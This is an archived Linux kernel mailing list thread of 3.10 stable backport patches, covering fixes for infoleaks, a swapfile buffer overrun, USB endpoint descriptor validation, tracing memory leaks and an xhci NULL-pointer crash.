linux-kernel.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok()
@ 2017-02-05 19:18 Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
                   ` (218 more replies)
  0 siblings, 219 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Al Viro, Al Viro, Linus Torvalds, Willy Tarreau

From: Al Viro <viro@ZenIV.linux.org.uk>

commit e23d4159b109167126e5bcd7f3775c95de7fee47 upstream.

Switching iov_iter fault-in to multipages variants has exposed an old
bug in underlying fault_in_multipages_...(); they break if the range
passed to them wraps around.  Normally access_ok() done by callers will
prevent such (and it's a guaranteed EFAULT - ERR_PTR() values fall into
such a range and they should not point to any valid objects).

However, on architectures where userland and kernel live in different
MMU contexts (e.g. s390) access_ok() is a no-op and on those a range
with a wraparound can reach fault_in_multipages_...().

Since any wraparound means EFAULT there, the fix is trivial - turn
those

    while (uaddr <= end)
	    ...
into

    if (unlikely(uaddr > end))
	    return -EFAULT;
    do
	    ...
    while (uaddr <= end);

Reported-by: Jan Stancek <jstancek@redhat.com>
Tested-by: Jan Stancek <jstancek@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/pagemap.h | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/include/linux/pagemap.h b/include/linux/pagemap.h
index e3dea75..9497527 100644
--- a/include/linux/pagemap.h
+++ b/include/linux/pagemap.h
@@ -482,56 +482,56 @@ static inline int fault_in_pages_readable(const char __user *uaddr, int size)
  */
 static inline int fault_in_multipages_writeable(char __user *uaddr, int size)
 {
-	int ret = 0;
 	char __user *end = uaddr + size - 1;
 
 	if (unlikely(size == 0))
-		return ret;
+		return 0;
 
+	if (unlikely(uaddr > end))
+		return -EFAULT;
 	/*
 	 * Writing zeroes into userspace here is OK, because we know that if
 	 * the zero gets there, we'll be overwriting it.
 	 */
-	while (uaddr <= end) {
-		ret = __put_user(0, uaddr);
-		if (ret != 0)
-			return ret;
+	do {
+		if (unlikely(__put_user(0, uaddr) != 0))
+			return -EFAULT;
 		uaddr += PAGE_SIZE;
-	}
+	} while (uaddr <= end);
 
 	/* Check whether the range spilled into the next page. */
 	if (((unsigned long)uaddr & PAGE_MASK) ==
 			((unsigned long)end & PAGE_MASK))
-		ret = __put_user(0, end);
+		return __put_user(0, end);
 
-	return ret;
+	return 0;
 }
 
 static inline int fault_in_multipages_readable(const char __user *uaddr,
 					       int size)
 {
 	volatile char c;
-	int ret = 0;
 	const char __user *end = uaddr + size - 1;
 
 	if (unlikely(size == 0))
-		return ret;
+		return 0;
 
-	while (uaddr <= end) {
-		ret = __get_user(c, uaddr);
-		if (ret != 0)
-			return ret;
+	if (unlikely(uaddr > end))
+		return -EFAULT;
+
+	do {
+		if (unlikely(__get_user(c, uaddr) != 0))
+			return -EFAULT;
 		uaddr += PAGE_SIZE;
-	}
+	} while (uaddr <= end);
 
 	/* Check whether the range spilled into the next page. */
 	if (((unsigned long)uaddr & PAGE_MASK) ==
 			((unsigned long)end & PAGE_MASK)) {
-		ret = __get_user(c, end);
-		(void)c;
+		return __get_user(c, end);
 	}
 
-	return ret;
+	return 0;
 }
 
 int add_to_page_cache_locked(struct page *page, struct address_space *mapping,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump Willy Tarreau
                   ` (217 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Al Viro, Willy Tarreau

From: Al Viro <viro@zeniv.linux.org.uk>

commit 1ae2293dd6d2f5c823cf97e60b70d03631cd622f upstream.

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/trace/trace.c | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
index eff26a9..4ff36f7 100644
--- a/kernel/trace/trace.c
+++ b/kernel/trace/trace.c
@@ -5168,11 +5168,6 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
 	}
 #endif
 
-	if (splice_grow_spd(pipe, &spd)) {
-		ret = -ENOMEM;
-		goto out;
-	}
-
 	if (*ppos & (PAGE_SIZE - 1)) {
 		ret = -EINVAL;
 		goto out;
@@ -5186,6 +5181,11 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
 		len &= PAGE_MASK;
 	}
 
+	if (splice_grow_spd(pipe, &spd)) {
+		ret = -ENOMEM;
+		goto out;
+	}
+
  again:
 	trace_access_lock(iter->cpu_file);
 	entries = ring_buffer_entries_cpu(iter->trace_buffer->buffer, iter->cpu_file);
@@ -5241,21 +5241,22 @@ tracing_buffers_splice_read(struct file *file, loff_t *ppos,
 	if (!spd.nr_pages) {
 		if ((file->f_flags & O_NONBLOCK) || (flags & SPLICE_F_NONBLOCK)) {
 			ret = -EAGAIN;
-			goto out;
+			goto out_shrink;
 		}
 		mutex_unlock(&trace_types_lock);
 		ret = iter->trace->wait_pipe(iter);
 		mutex_lock(&trace_types_lock);
 		if (ret)
-			goto out;
+			goto out_shrink;
 		if (signal_pending(current)) {
 			ret = -EINTR;
-			goto out;
+			goto out_shrink;
 		}
 		goto again;
 	}
 
 	ret = splice_to_pipe(pipe, &spd);
+out_shrink:
 	splice_shrink_spd(&spd);
 out:
 	mutex_unlock(&trace_types_lock);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 103/319] Fix potential infoleak in older kernels Willy Tarreau
                   ` (216 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Al Viro, Willy Tarreau

From: Al Viro <viro@zeniv.linux.org.uk>

commit 7798bf2140ebcc36eafec6a4194fffd8d585d471 upstream.

On faulting sigreturn we do get SIGSEGV, all right, but anything
we'd put into pt_regs could end up in the coredump.  And since
__copy_from_user() never zeroed on arc, we'd better bugger off
on its failure without copying random uninitialized bits of
kernel stack into pt_regs...

Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/arc/kernel/signal.c | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c
index 6763654..0823087 100644
--- a/arch/arc/kernel/signal.c
+++ b/arch/arc/kernel/signal.c
@@ -80,13 +80,14 @@ static int restore_usr_regs(struct pt_regs *regs, struct rt_sigframe __user *sf)
 	int err;
 
 	err = __copy_from_user(&set, &sf->uc.uc_sigmask, sizeof(set));
-	if (!err)
-		set_current_blocked(&set);
-
-	err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs),
+	err |= __copy_from_user(regs, &(sf->uc.uc_mcontext.regs.scratch),
 				sizeof(sf->uc.uc_mcontext.regs.scratch));
+	if (err)
+		return err;
 
-	return err;
+	set_current_blocked(&set);
+
+	return 0;
 }
 
 static inline int is_do_ss_needed(unsigned int magic)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 103/319] Fix potential infoleak in older kernels
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile Willy Tarreau
                   ` (215 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Linus Torvalds, Jiri Slaby, Willy Tarreau

From: Linus Torvalds <torvalds@linux-foundation.org>

Not upstream as it is not needed there.

So a patch something like this might be a safe way to fix the
potential infoleak in older kernels.

THIS IS UNTESTED. It's a very obvious patch, though, so if it compiles
it probably works. It just initializes the output variable with 0 in
the inline asm description, instead of doing it in the exception
handler.

It will generate slightly worse code (a few unnecessary ALU
operations), but it doesn't have any interactions with the exception
handler implementation.

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 arch/x86/include/asm/uaccess.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
index 5ee2687..995c49a 100644
--- a/arch/x86/include/asm/uaccess.h
+++ b/arch/x86/include/asm/uaccess.h
@@ -381,7 +381,7 @@ do {									\
 	asm volatile("1:	mov"itype" %1,%"rtype"0\n"		\
 		     "2:\n"						\
 		     _ASM_EXTABLE_EX(1b, 2b)				\
-		     : ltype(x) : "m" (__m(addr)))
+		     : ltype(x) : "m" (__m(addr)), "0" (0))
 
 #define __put_user_nocheck(x, ptr, size)			\
 ({								\
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (2 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 103/319] Fix potential infoleak in older kernels Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task Willy Tarreau
                   ` (214 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Jann Horn, Kirill A. Shutemov, Vlastimil Babka, Hugh Dickins,
	Andrew Morton, Linus Torvalds, Willy Tarreau

From: Jann Horn <jann@thejh.net>

commit dd111be69114cc867f8e826284559bfbc1c40e37 upstream.

When root activates a swap partition whose header has the wrong
endianness, nr_badpages elements of badpages are swabbed before
nr_badpages has been checked, leading to a buffer overrun of up to 8GB.

This normally is not a security issue because it can only be exploited
by root (more specifically, a process with CAP_SYS_ADMIN or the ability
to modify a swap file/partition), and such a process can already e.g.
modify swapped-out memory of any other userspace process on the system.

Link: http://lkml.kernel.org/r/1477949533-2509-1-git-send-email-jann@thejh.net
Signed-off-by: Jann Horn <jann@thejh.net>
Acked-by: Kees Cook <keescook@chromium.org>
Acked-by: Jerome Marchand <jmarchan@redhat.com>
Acked-by: Johannes Weiner <hannes@cmpxchg.org>
Cc: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
Cc: Vlastimil Babka <vbabka@suse.cz>
Cc: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 mm/swapfile.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/mm/swapfile.c b/mm/swapfile.c
index 746af55b..d0a8983 100644
--- a/mm/swapfile.c
+++ b/mm/swapfile.c
@@ -1922,6 +1922,8 @@ static unsigned long read_swap_header(struct swap_info_struct *p,
 		swab32s(&swap_header->info.version);
 		swab32s(&swap_header->info.last_page);
 		swab32s(&swap_header->info.nr_badpages);
+		if (swap_header->info.nr_badpages > MAX_SWAP_BADPAGES)
+			return 0;
 		for (i = 0; i < swap_header->info.nr_badpages; i++)
 			swab32s(&swap_header->info.badpages[i]);
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (3 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once Willy Tarreau
                   ` (213 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Ryabinin, Alexander Viro, Tejun Heo, Rafael J. Wysocki,
	Michal Hocko, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Andrey Ryabinin <aryabinin@virtuozzo.com>

commit 70d78fe7c8b640b5acfad56ad341985b3810998a upstream.

It could be not possible to freeze coredumping task when it waits for
'core_state->startup' completion, because threads are frozen in
get_signal() before they got a chance to complete 'core_state->startup'.

Inability to freeze a task during suspend will cause suspend to fail.
Also CRIU uses cgroup freezer during dump operation.  So with an
unfreezable task the CRIU dump will fail because it waits for a
transition from 'FREEZING' to 'FROZEN' state which will never happen.

Use freezer_do_not_count() to tell freezer to ignore coredumping task
while it waits for core_state->startup completion.

Link: http://lkml.kernel.org/r/1475225434-3753-1-git-send-email-aryabinin@virtuozzo.com
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Acked-by: Pavel Machek <pavel@ucw.cz>
Acked-by: Oleg Nesterov <oleg@redhat.com>
Cc: Alexander Viro <viro@zeniv.linux.org.uk>
Cc: Tejun Heo <tj@kernel.org>
Cc: "Rafael J. Wysocki" <rjw@rjwysocki.net>
Cc: Michal Hocko <mhocko@kernel.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/coredump.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/fs/coredump.c b/fs/coredump.c
index 4f03b2b..a94f94d 100644
--- a/fs/coredump.c
+++ b/fs/coredump.c
@@ -1,6 +1,7 @@
 #include <linux/slab.h>
 #include <linux/file.h>
 #include <linux/fdtable.h>
+#include <linux/freezer.h>
 #include <linux/mm.h>
 #include <linux/stat.h>
 #include <linux/fcntl.h>
@@ -375,7 +376,9 @@ static int coredump_wait(int exit_code, struct core_state *core_state)
 	if (core_waiters > 0) {
 		struct core_thread *ptr;
 
+		freezer_do_not_count();
 		wait_for_completion(&core_state->startup);
+		freezer_count();
 		/*
 		 * Wait for all the threads to become inactive, so that
 		 * all the thread context (extended register state, like
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (4 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors Willy Tarreau
                   ` (212 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felipe Balbi, Willy Tarreau

From: Felipe Balbi <felipe.balbi@linux.intel.com>

commit c7de573471832dff7d31f0c13b0f143d6f017799 upstream.

When using SG lists, we would end up setting
request->actual to:

	num_mapped_sgs * (request->length - count)

Let's fix that up by incrementing request->actual
only once.

Reported-by: Brian E Rogers <brian.e.rogers@intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/dwc3/gadget.c | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
index 6e70c88..0dfee61 100644
--- a/drivers/usb/dwc3/gadget.c
+++ b/drivers/usb/dwc3/gadget.c
@@ -1802,14 +1802,6 @@ static int __dwc3_cleanup_done_trbs(struct dwc3 *dwc, struct dwc3_ep *dep,
 			s_pkt = 1;
 	}
 
-	/*
-	 * We assume here we will always receive the entire data block
-	 * which we should receive. Meaning, if we program RX to
-	 * receive 4K but we receive only 2K, we assume that's all we
-	 * should receive and we simply bounce the request back to the
-	 * gadget driver for further processing.
-	 */
-	req->request.actual += req->request.length - count;
 	if (s_pkt)
 		return 1;
 	if ((event->status & DEPEVT_STATUS_LST) &&
@@ -1829,6 +1821,7 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
 	struct dwc3_trb		*trb;
 	unsigned int		slot;
 	unsigned int		i;
+	int			count = 0;
 	int			ret;
 
 	do {
@@ -1845,6 +1838,8 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
 				slot++;
 			slot %= DWC3_TRB_NUM;
 			trb = &dep->trb_pool[slot];
+			count += trb->size & DWC3_TRB_SIZE_MASK;
+
 
 			ret = __dwc3_cleanup_done_trbs(dwc, dep, req, trb,
 					event, status);
@@ -1852,6 +1847,14 @@ static int dwc3_cleanup_done_reqs(struct dwc3 *dwc, struct dwc3_ep *dep,
 				break;
 		}while (++i < req->request.num_mapped_sgs);
 
+		/*
+		 * We assume here we will always receive the entire data block
+		 * which we should receive. Meaning, if we program RX to
+		 * receive 4K but we receive only 2K, we assume that's all we
+		 * should receive and we simply bounce the request back to the
+		 * gadget driver for further processing.
+		 */
+		req->request.actual += req->request.length - count;
 		dwc3_gadget_giveback(dep, req, status);
 
 		if (ret)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (5 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation Willy Tarreau
                   ` (211 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alan Stern, Greg Kroah-Hartman, Willy Tarreau

From: Alan Stern <stern@rowland.harvard.edu>

commit aed9d65ac3278d4febd8665bd7db59ef53e825fe upstream.

Erroneous or malicious endpoint descriptors may have non-zero bits in
reserved positions, or out-of-bounds values.  This patch helps prevent
these from causing problems by bounds-checking the wMaxPacketValue
entries in endpoint descriptors and capping the values at the maximum
allowed.

This issue was first discovered and tests were conducted by Jake Lamberson
<jake.lamberson1@gmail.com>, an intern working for Rosie Hall.

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Reported-by: roswest <roswest@cisco.com>
Tested-by: roswest <roswest@cisco.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[wt: adjusted to 3.10 -- no USB_SPEED_SUPER_PLUS]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/core/config.c | 65 ++++++++++++++++++++++++++++++++++++++++++++---
 1 file changed, 62 insertions(+), 3 deletions(-)

diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
index 9b05e88..ecb2acb 100644
--- a/drivers/usb/core/config.c
+++ b/drivers/usb/core/config.c
@@ -144,6 +144,31 @@ static void usb_parse_ss_endpoint_companion(struct device *ddev, int cfgno,
 	}
 }
 
+static const unsigned short low_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 8,
+	[USB_ENDPOINT_XFER_ISOC] = 0,
+	[USB_ENDPOINT_XFER_BULK] = 0,
+	[USB_ENDPOINT_XFER_INT] = 8,
+};
+static const unsigned short full_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 64,
+	[USB_ENDPOINT_XFER_ISOC] = 1023,
+	[USB_ENDPOINT_XFER_BULK] = 64,
+	[USB_ENDPOINT_XFER_INT] = 64,
+};
+static const unsigned short high_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 64,
+	[USB_ENDPOINT_XFER_ISOC] = 1024,
+	[USB_ENDPOINT_XFER_BULK] = 512,
+	[USB_ENDPOINT_XFER_INT] = 1023,
+};
+static const unsigned short super_speed_maxpacket_maxes[4] = {
+	[USB_ENDPOINT_XFER_CONTROL] = 512,
+	[USB_ENDPOINT_XFER_ISOC] = 1024,
+	[USB_ENDPOINT_XFER_BULK] = 1024,
+	[USB_ENDPOINT_XFER_INT] = 1024,
+};
+
 static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
     int asnum, struct usb_host_interface *ifp, int num_ep,
     unsigned char *buffer, int size)
@@ -152,6 +177,8 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 	struct usb_endpoint_descriptor *d;
 	struct usb_host_endpoint *endpoint;
 	int n, i, j, retval;
+	unsigned int maxp;
+	const unsigned short *maxpacket_maxes;
 
 	d = (struct usb_endpoint_descriptor *) buffer;
 	buffer += d->bLength;
@@ -247,6 +274,41 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 			endpoint->desc.wMaxPacketSize = cpu_to_le16(8);
 	}
 
+	/* Validate the wMaxPacketSize field */
+	maxp = usb_endpoint_maxp(&endpoint->desc);
+
+	/* Find the highest legal maxpacket size for this endpoint */
+	i = 0;		/* additional transactions per microframe */
+	switch (to_usb_device(ddev)->speed) {
+	case USB_SPEED_LOW:
+		maxpacket_maxes = low_speed_maxpacket_maxes;
+		break;
+	case USB_SPEED_FULL:
+		maxpacket_maxes = full_speed_maxpacket_maxes;
+		break;
+	case USB_SPEED_HIGH:
+		/* Bits 12..11 are allowed only for HS periodic endpoints */
+		if (usb_endpoint_xfer_int(d) || usb_endpoint_xfer_isoc(d)) {
+			i = maxp & (BIT(12) | BIT(11));
+			maxp &= ~i;
+		}
+		/* fallthrough */
+	default:
+		maxpacket_maxes = high_speed_maxpacket_maxes;
+		break;
+	case USB_SPEED_SUPER:
+		maxpacket_maxes = super_speed_maxpacket_maxes;
+		break;
+	}
+	j = maxpacket_maxes[usb_endpoint_type(&endpoint->desc)];
+
+	if (maxp > j) {
+		dev_warn(ddev, "config %d interface %d altsetting %d endpoint 0x%X has invalid maxpacket %d, setting to %d\n",
+		    cfgno, inum, asnum, d->bEndpointAddress, maxp, j);
+		maxp = j;
+		endpoint->desc.wMaxPacketSize = cpu_to_le16(i | maxp);
+	}
+
 	/*
 	 * Some buggy high speed devices have bulk endpoints using
 	 * maxpacket sizes other than 512.  High speed HCDs may not
@@ -254,9 +316,6 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 	 */
 	if (to_usb_device(ddev)->speed == USB_SPEED_HIGH
 			&& usb_endpoint_xfer_bulk(d)) {
-		unsigned maxp;
-
-		maxp = usb_endpoint_maxp(&endpoint->desc) & 0x07ff;
 		if (maxp != 512)
 			dev_warn(ddev, "config %d interface %d altsetting %d "
 				"bulk endpoint 0x%X has invalid maxpacket %d\n",
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (6 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect Willy Tarreau
                   ` (210 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alan Stern, Greg Kroah-Hartman, Willy Tarreau

From: Alan Stern <stern@rowland.harvard.edu>

commit 6c73358c83ce870c0cf32413e5cadb3b9a39c606 upstream.

The maximum value allowed for wMaxPacketSize of a high-speed interrupt
endpoint is 1024 bytes, not 1023.

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Fixes: aed9d65ac327 ("USB: validate wMaxPacketValue entries in endpoint descriptors")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/core/config.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
index ecb2acb..b7ba1f9 100644
--- a/drivers/usb/core/config.c
+++ b/drivers/usb/core/config.c
@@ -160,7 +160,7 @@ static const unsigned short high_speed_maxpacket_maxes[4] = {
 	[USB_ENDPOINT_XFER_CONTROL] = 64,
 	[USB_ENDPOINT_XFER_ISOC] = 1024,
 	[USB_ENDPOINT_XFER_BULK] = 512,
-	[USB_ENDPOINT_XFER_INT] = 1023,
+	[USB_ENDPOINT_XFER_INT] = 1024,
 };
 static const unsigned short super_speed_maxpacket_maxes[4] = {
 	[USB_ENDPOINT_XFER_CONTROL] = 512,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (7 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path Willy Tarreau
                   ` (209 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jim Lin, Mathias Nyman, Willy Tarreau

From: Jim Lin <jilin@nvidia.com>

commit 88716a93766b8f095cdef37a8e8f2c93aa233b21 upstream.

After a device is disconnected, xhci_stop_device() will be invoked
in xhci_bus_suspend().
Also the "disconnect" IRQ will have ISR to invoke
xhci_free_virt_device() in this sequence.
xhci_irq -> xhci_handle_event -> handle_cmd_completion ->
xhci_handle_cmd_disable_slot -> xhci_free_virt_device

If xhci->devs[slot_id] has been assigned to NULL in
xhci_free_virt_device(), then virt_dev->eps[i].ring in
xhci_stop_device() may point to an invlid address to cause kernel
panic.

virt_dev = xhci->devs[slot_id];
:
if (virt_dev->eps[i].ring && virt_dev->eps[i].ring->dequeue)

[] Unable to handle kernel paging request at virtual address 00001a68
[] pgd=ffffffc001430000
[] [00001a68] *pgd=000000013c807003, *pud=000000013c807003,
*pmd=000000013c808003, *pte=0000000000000000
[] Internal error: Oops: 96000006 [#1] PREEMPT SMP
[] CPU: 0 PID: 39 Comm: kworker/0:1 Tainted: G     U
[] Workqueue: pm pm_runtime_work
[] task: ffffffc0bc0e0bc0 ti: ffffffc0bc0ec000 task.ti:
ffffffc0bc0ec000
[] PC is at xhci_stop_device.constprop.11+0xb4/0x1a4

This issue is found when running with realtek ethernet device
(0bda:8153).

Signed-off-by: Jim Lin <jilin@nvidia.com>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/host/xhci-hub.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/usb/host/xhci-hub.c b/drivers/usb/host/xhci-hub.c
index 0f71c3a..0f6edce 100644
--- a/drivers/usb/host/xhci-hub.c
+++ b/drivers/usb/host/xhci-hub.c
@@ -275,6 +275,9 @@ static int xhci_stop_device(struct xhci_hcd *xhci, int slot_id, int suspend)
 
 	ret = 0;
 	virt_dev = xhci->devs[slot_id];
+	if (!virt_dev)
+		return -ENODEV;
+
 	cmd = xhci_alloc_command(xhci, false, true, GFP_NOIO);
 	if (!cmd) {
 		xhci_dbg(xhci, "Couldn't allocate command structure.\n");
-- 
2.8.0.rc2.1.gbe9624a

